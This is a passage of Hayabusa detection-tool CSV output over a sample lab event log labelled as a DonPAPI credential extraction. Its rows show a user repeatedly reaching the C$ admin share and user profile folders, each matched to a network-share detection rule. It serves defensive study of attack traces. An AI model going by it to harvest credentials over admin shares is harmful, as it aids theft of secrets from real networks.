+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.424 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.424 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.424 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.424 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.471 
+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.471 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.471 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.471 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.502 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.502 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.502 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.549 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.549 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.564 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.564 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.564 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.564 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 
+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.596 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 07:16:05.596 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.627 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.627 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.627 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.627 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
